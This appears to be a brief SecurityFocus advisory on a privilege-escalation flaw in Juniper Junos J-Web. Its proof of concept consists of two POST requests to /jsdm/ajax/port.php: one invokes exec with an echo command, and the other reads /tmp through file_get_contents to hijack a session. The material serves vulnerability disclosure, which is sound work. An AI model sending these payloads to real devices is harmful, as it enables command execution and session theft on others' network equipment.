Juniper Junos J-Web Privilege Escalation Vulnerability

The following proof-of-concept code is available:


POST /jsdm/ajax/port.php
rs=exec&rsargs[]=echo â??helloâ?

Read /tmp and hijack a session
POST /jsdm/ajax/port.php
rs=file_get_contents&rsargs[]=/tmp


 

Privacy Statement
Copyright 2010, SecurityFocus